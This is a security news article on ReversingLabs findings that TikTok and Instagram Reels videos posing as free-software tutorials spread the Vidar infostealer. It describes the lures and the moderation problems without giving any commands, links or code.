Cybercriminals are using TikTok and Instagram Reels videos to spread Vidar, an infostealer malware, through fake downloads for popular paid software, according to ReversingLabs.
The researchers uncovered two campaigns behind the activity, each using a different approach to draw in viewers before sending them to external download sites.
One campaign centered on fake software installation tutorials featuring polished graphics and voiceovers. The second built audiences through a stream of videos promoting free access to premium software before directing viewers to a central tutorial containing download instructions.
“Either approach is a means to a different end, and the differences demonstrate how attackers can leverage different aspects of social media engagement to reach more potential victims,” the researchers wrote.
Fake software tutorials deliver Vidar
The first campaign relied on a network of accounts masquerading as technology support pages. Researchers observed profiles using names such as “windows.tips” and “windows.insights,” along with blue-and-white profile images that resembled Microsoft’s branding.
Screenshot of the malicious user, showing their profile picture (Source: ReversingLabs)
The accounts posted short tutorials claiming to show users how to unlock paid software at no cost. In one example, viewers were instructed to open PowerShell from the Windows menu and run a command that supposedly unlocked Spotify Premium.
“A non-technical user does not know any better, and may assume it is legitimate. Attackers are relying on this lack of understanding,” the researchers noted.
Presented as a simple software tip, the command instead downloaded a file identified as Vidar.
Some of the videos gained significant traction. One tutorial amassed more than 100,000 views and generated thousands of saves, shares and likes.
Saves, shares and comments carry greater weight than likes because users are more selective when using those forms of engagement, helping boost a video’s visibility in recommendation algorithms.
Vidar, first identified in 2018, is an information-stealing malware family used to collect credentials, financial information and authentication tokens from infected devices. The malware received an update in October 2025 that improved its stability and evasion capabilities. Access to the service has also been advertised through a $300 lifetime license.
Building engagement before the pitch
The second campaign took a less polished approach. The accounts posted short videos featuring services such as Spotify Premium, claiming the premium features had been unlocked for free.
Rather than providing instructions upfront, the videos encouraged viewers to leave comments or visit other posts to learn how the software had been obtained.
Users were then directed to tutorial videos, direct messages or links in account profiles that led to websites advertising free software, games and AI tools.
Some of the sites required visitors to complete surveys and navigate a series of redirects before they could access the promised downloads.
Download screen for Spotify Premium, with a list of 5 tasks to do to unlock the download (Source: ReversingLabs)
Because they were unable to complete the required surveys, the researchers could not determine the final payload delivered through the links.
A moderation challenge
Malicious videos can be difficult to contain once they begin attracting views.
“Users who catch onto the malicious intent, either through research or falling for it themselves, may try to warn others in the comments. However, most platforms allow for creators to delete comments and block commenters, so diligent attackers can snuff out this resistance.”
Reporting the content does not always result in its removal. During the investigation, attempts to report some of the videos to Instagram as scams were rejected, allowing the content to remain accessible to users.
Even when videos or accounts are removed, new accounts can quickly appear and continue posting similar content, making enforcement an ongoing challenge.
ReversingLabs has published a list of indicators of compromise (IoCs) associated with the campaigns to help defenders identify related activity.
